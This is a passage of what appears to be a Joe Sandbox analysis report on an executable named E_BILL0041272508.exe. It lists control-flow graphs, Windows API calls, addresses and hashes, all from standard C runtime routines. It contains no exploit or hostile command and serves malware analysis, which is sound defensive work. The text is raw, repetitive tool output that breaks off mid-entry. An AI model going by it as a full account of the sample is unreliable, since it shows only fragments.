                                                                                                                                                  control_flow_graph 293 9b8417-9b8474 GetConsoleCP 294 9b847a-9b8496 293->294 295 9b85b7-9b85c9 call 9b123a 293->295 297 9b8498-9b84af 294->297 298 9b84b1-9b84c2 call 9b6052 294->298 300 9b84eb-9b84fa call 9b72b7 297->300 304 9b84e8-9b84ea 298->304 305 9b84c4-9b84c7 298->305 300->295 309 9b8500-9b8520 WideCharToMultiByte 300->309 304->300 307 9b858e-9b85ad 305->307 308 9b84cd-9b84df call 9b72b7 305->308 307->295 308->295 315 9b84e5-9b84e6 308->315 309->295 311 9b8526-9b853c WriteFile 309->311 313 9b85af-9b85b5 GetLastError 311->313 314 9b853e-9b854f 311->314 313->295 314->295 316 9b8551-9b8555 314->316 315->309 317 9b8583-9b8586 316->317 318 9b8557-9b8575 WriteFile 316->318 317->294 319 9b858c 317->319 318->313 320 9b8577-9b857b 318->320 319->295 320->295 321 9b857d-9b8580 320->321 321->317
                                                                                                                                                  APIs
                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009B8B8C,?,00000000,?,00000000,00000000), ref: 009B8459
                                                                                                                                                  • __fassign.LIBCMT ref: 009B84D4
                                                                                                                                                  • __fassign.LIBCMT ref: 009B84EF
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009B8515
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,009B8B8C,00000000,?,?,?,?,?,?,?,?,?,009B8B8C,?), ref: 009B8534
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,009B8B8C,00000000,?,?,?,?,?,?,?,?,?,009B8B8C,?), ref: 009B856D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                  • Opcode ID: 7023e6bc8629dd21298b1c37ddc0b34407cc7253904a466fc1da2b7104344c07
                                                                                                                                                  • Instruction ID: 4545fef181366f3f7b854ac4d12e7a0c0cec77466bf84a54e5b9cf5d634bbab2
                                                                                                                                                  • Opcode Fuzzy Hash: 7023e6bc8629dd21298b1c37ddc0b34407cc7253904a466fc1da2b7104344c07
                                                                                                                                                  • Instruction Fuzzy Hash: A451BF70E002499FDB20CFA8D985AEEBBFDEF19320F14415AF955E7291DB709941CBA0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 322 9b1e00-9b1e51 call 9bac80 call 9b1dc0 call 9b2377 329 9b1ead-9b1eb0 322->329 330 9b1e53-9b1e65 322->330 331 9b1eb2-9b1ebf call 9b2360 329->331 332 9b1ed0-9b1ed9 329->332 330->332 333 9b1e67-9b1e7e 330->333 337 9b1ec4-9b1ecd call 9b1dc0 331->337 335 9b1e80-9b1e8e call 9b2300 333->335 336 9b1e94 333->336 345 9b1e90 335->345 346 9b1ea4-9b1eab 335->346 339 9b1e97-9b1e9c 336->339 337->332 339->333 342 9b1e9e-9b1ea0 339->342 342->332 343 9b1ea2 342->343 343->337 347 9b1eda-9b1ee3 345->347 348 9b1e92 345->348 346->337 349 9b1f1d-9b1f2d call 9b2340 347->349 350 9b1ee5-9b1eec 347->350 348->339 355 9b1f2f-9b1f3e call 9b2360 349->355 356 9b1f41-9b1f5d call 9b1dc0 call 9b2320 349->356 350->349 352 9b1eee-9b1efd call 9baac0 350->352 360 9b1f1a 352->360 361 9b1eff-9b1f17 352->361 355->356 360->349 361->360
                                                                                                                                                  APIs
                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009B1E37
                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 009B1E3F
                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009B1EC8
                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 009B1EF3
                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009B1F48
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                  • Opcode ID: 961ce01566496b57f2c3c8e23cc353ee6b39e1337ab52f02c3e16495fbed4752
                                                                                                                                                  • Instruction ID: be40c022417c26c6b4f129a287aaa441af078305045340c7bf91f9970523eaed
                                                                                                                                                  • Opcode Fuzzy Hash: 961ce01566496b57f2c3c8e23cc353ee6b39e1337ab52f02c3e16495fbed4752
                                                                                                                                                  • Instruction Fuzzy Hash: 2B41B134A00208ABCF10DF68C995BEEBBB5EF85374F548055E8159B292D735E901CB91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 368 9b621b-9b6226 369 9b62fc-9b62fe 368->369 370 9b622c-9b62f9 call 9b61df * 5 call 9b4869 * 3 call 9b61df * 5 call 9b4869 * 4 368->370 370->369
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 009B61DF: _free.LIBCMT ref: 009B6208
                                                                                                                                                  • _free.LIBCMT ref: 009B6269
                                                                                                                                                    • Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
                                                                                                                                                    • Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891
                                                                                                                                                  • _free.LIBCMT ref: 009B6274
                                                                                                                                                  • _free.LIBCMT ref: 009B627F
                                                                                                                                                  • _free.LIBCMT ref: 009B62D3
                                                                                                                                                  • _free.LIBCMT ref: 009B62DE
                                                                                                                                                  • _free.LIBCMT ref: 009B62E9
                                                                                                                                                  • _free.LIBCMT ref: 009B62F4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                  • Instruction ID: 5bd093fe8413fce8a5b4b814a166615336307300b3e07743b5a751f5d114df83
                                                                                                                                                  • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                  • Instruction Fuzzy Hash: 38115171544B14AAD520B7B5CE07FCB77AC5F80720F404825F69EAA093DA79BA045690

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 405 9b23d1-9b23d8 406 9b23da-9b23dc 405->406 407 9b23dd-9b23f8 GetLastError call 9b26a4 405->407 410 9b23fa-9b23fc 407->410 411 9b2411-9b2413 407->411 412 9b23fe-9b240f call 9b26df 410->412 413 9b2457-9b2462 SetLastError 410->413 411->413 412->411 416 9b2415-9b2425 call 9b3f67 412->416 419 9b2439-9b2449 call 9b26df 416->419 420 9b2427-9b2437 call 9b26df 416->420 426 9b244f-9b2456 call 9b3ec5 419->426 420->419 425 9b244b-9b244d 420->425 425->426 426->413
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(?,?,009B23C8,009B209F,009B1AFC), ref: 009B23DF
                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009B23ED
                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009B2406
                                                                                                                                                  • SetLastError.KERNEL32(00000000,009B23C8,009B209F,009B1AFC), ref: 009B2458
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                  • Opcode ID: 9b004e3385ba15a9b773ef25430f80a8f4e860bb8a63a8da99b73b782179515a
                                                                                                                                                  • Instruction ID: cc45b61b704da7b5adf8bb2438c7e54a189c82b54ec31b64612da6566d0b5ea3
                                                                                                                                                  • Opcode Fuzzy Hash: 9b004e3385ba15a9b773ef25430f80a8f4e860bb8a63a8da99b73b782179515a
                                                                                                                                                  • Instruction Fuzzy Hash: 99012B7351D3159FA72467B87E85BE72B59EB427F5730033AF920814F9EF518C81A244

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 429 9b4424-9b4438 GetLastError 430 9b443a-9b4444 call 9b5904 429->430 431 9b4446-9b444b 429->431 430->431 436 9b448f-9b449a SetLastError 430->436 433 9b444d call 9b480c 431->433 435 9b4452-9b4458 433->435 437 9b445a 435->437 438 9b4463-9b4471 call 9b595a 435->438 439 9b445b-9b4461 call 9b4869 437->439 444 9b4473-9b4474 438->444 445 9b4476-9b448d call 9b4296 call 9b4869 438->445 447 9b449b-9b44a7 SetLastError call 9b3f24 439->447 444->439 445->436 445->447
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,009B6D69,?,?,?,009C04C8,0000002C,009B3F34,00000016,009B209F,009B1AFC), ref: 009B4428
                                                                                                                                                  • _free.LIBCMT ref: 009B445B
                                                                                                                                                  • _free.LIBCMT ref: 009B4483
                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 009B4490
                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 009B449C
                                                                                                                                                  • _abort.LIBCMT ref: 009B44A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                  • Opcode ID: fd049c40430bffcf526b03618c20a5a052193f864881f241c48b3d058f7cf038
                                                                                                                                                  • Instruction ID: 3492bde428778d7a8187d6c3850ee4512e442d04c59866b1f6965bc6ea9cd2d8
                                                                                                                                                  • Opcode Fuzzy Hash: fd049c40430bffcf526b03618c20a5a052193f864881f241c48b3d058f7cf038
                                                                                                                                                  • Instruction Fuzzy Hash: 88F02832914640ABC612B7396F09FFB22AF9BC1BB1B254514F528D61E7EFB188117161

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 453 9b36fc-9b3724 GetModuleHandleExW 454 9b3749-9b374d 453->454 455 9b3726-9b3739 GetProcAddress 453->455 458 9b3758-9b3765 call 9b123a 454->458 459 9b374f-9b3752 FreeLibrary 454->459 456 9b373b-9b3746 455->456 457 9b3748 455->457 456->457 457->454 459->458
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009B36AD,?,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002), ref: 009B371C
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009B372F
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,009B36AD,?,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002,00000000), ref: 009B3752
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                  • Opcode ID: 14c5be37604d50f3184fe0d4e1f452175de2a8ecfb723ad4ba3fbeca46f78ef6
                                                                                                                                                  • Instruction ID: 5a2158ef885eaca3cd1d8c9c73139aab744744477a7f6b312192d06d3b171112
                                                                                                                                                  • Opcode Fuzzy Hash: 14c5be37604d50f3184fe0d4e1f452175de2a8ecfb723ad4ba3fbeca46f78ef6
                                                                                                                                                  • Instruction Fuzzy Hash: 9BF04470A14208BBCB119B94DD59BEEBFB8EF44765F404169F805A2190DBB45A44DA90
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009B54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 009B639A
                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009B63D2
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009B6423
                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009B6435
                                                                                                                                                  • __freea.LIBCMT ref: 009B643E
                                                                                                                                                    • Part of subcall function 009B62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009B7E5B,?,00000000,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD), ref: 009B6331
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1857427562-0
                                                                                                                                                  • Opcode ID: 177e54c73e9ebac12fde0ade1b04a0af2649401104fd5baa254cec777c96cfec
                                                                                                                                                  • Instruction ID: 71147c678065bdb25821d5df7e1f714f03a5e76c5e1a25120963d135039fa90d
                                                                                                                                                  • Opcode Fuzzy Hash: 177e54c73e9ebac12fde0ade1b04a0af2649401104fd5baa254cec777c96cfec
                                                                                                                                                  • Instruction Fuzzy Hash: A231B072A0061AABDF259F64DD45EEE7BAAEF40720F044128FC14D61A0E739ED55CBA0
                                                                                                                                                  APIs
                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 009B5627
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009B564A
                                                                                                                                                    • Part of subcall function 009B62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009B7E5B,?,00000000,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD), ref: 009B6331
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009B5670
                                                                                                                                                  • _free.LIBCMT ref: 009B5683
                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009B5692
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                  • Opcode ID: 06a116031c4312d879b1a6ba853a29b18ded6cb2dde472b09bb7a3c0dd43e088
                                                                                                                                                  • Instruction ID: cebd59e6ea8e5808bbee415ddd254f3da62fceb80a79318fe6d6810380ca34b7
                                                                                                                                                  • Opcode Fuzzy Hash: 06a116031c4312d879b1a6ba853a29b18ded6cb2dde472b09bb7a3c0dd43e088
                                                                                                                                                  • Instruction Fuzzy Hash: 2601F772605A15BF27212ABA5E4CEBB6B6DDEC2FB4357022AF904C3140EBA08C0191B0
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009B47FE,009B7E79,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD,?,00000000), ref: 009B44AD
                                                                                                                                                  • _free.LIBCMT ref: 009B44E2
                                                                                                                                                  • _free.LIBCMT ref: 009B4509
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009B4516
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 009B451F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                  • Opcode ID: e1457ad83c7d54893c8242870985b258c9ea3749558b3f5087be20692fc9658e
                                                                                                                                                  • Instruction ID: d7f400d38008ed6d779061d95098e211c8357b4f268c7dd4a41b8f6dce9827fe
                                                                                                                                                  • Opcode Fuzzy Hash: e1457ad83c7d54893c8242870985b258c9ea3749558b3f5087be20692fc9658e
                                                                                                                                                  • Instruction Fuzzy Hash: DB012876654A40ABC22277356F49FFB226EEBC17717250125F429D21D3EFB48D017120
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 009B618E
                                                                                                                                                    • Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
                                                                                                                                                    • Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891
                                                                                                                                                  • _free.LIBCMT ref: 009B61A0
                                                                                                                                                  • _free.LIBCMT ref: 009B61B2
                                                                                                                                                  • _free.LIBCMT ref: 009B61C4
                                                                                                                                                  • _free.LIBCMT ref: 009B61D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: 45aaa6da12682fe9687be15c613953d07221c2b94ef554ae8507710d493cbf68
                                                                                                                                                  • Instruction ID: 194cf5283dde48c69dd7ed218cd775e1c75d514270bd60f4de6894d3f06c175d
                                                                                                                                                  • Opcode Fuzzy Hash: 45aaa6da12682fe9687be15c613953d07221c2b94ef554ae8507710d493cbf68
                                                                                                                                                  • Instruction Fuzzy Hash: 2CF09632A1C200AF8660EB5DFB81D9A77FDAA81B307580815F44DDB593C735FC809694
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 009B3DAD
                                                                                                                                                    • Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
                                                                                                                                                    • Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891
                                                                                                                                                  • _free.LIBCMT ref: 009B3DBF
                                                                                                                                                  • _free.LIBCMT ref: 009B3DD2
                                                                                                                                                  • _free.LIBCMT ref: 009B3DE3
                                                                                                                                                  • _free.LIBCMT ref: 009B3DF4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: 0a123ddc1269f74b22104cd22907c199462b85b4e9e01bf3edc4095c8e6e3055
                                                                                                                                                  • Instruction ID: 50e982fd5637f034a4d47999d936bf0bc6d06e4b0d4d278c4ab2c8c50ab28912
                                                                                                                                                  • Opcode Fuzzy Hash: 0a123ddc1269f74b22104cd22907c199462b85b4e9e01bf3edc4095c8e6e3055
                                                                                                                                                  • Instruction Fuzzy Hash: A8F0DA79C2C2A0DFD751AF15FD01E893B74AB867303450216F5129A2F3CB314A51BBD9
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\E_BILL0041272508.exe,00000104), ref: 009B2F93
                                                                                                                                                  • _free.LIBCMT ref: 009B305E
                                                                                                                                                  • _free.LIBCMT ref: 009B3068
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                  • String ID: C:\Users\user\Desktop\E_BILL0041272508.exe
                                                                                                                                                  • API String ID: 2506810119-172381570
                                                                                                                                                  • Opcode ID: b223cfdcb8f6297194cb43e773d402063a431434b672bad456d80a4997a2a51e
                                                                                                                                                  • Instruction ID: 459a15ff58deae3fcd9637c327c6bed35ad45fc441e6c02eddc1c6ae3f7e2cda
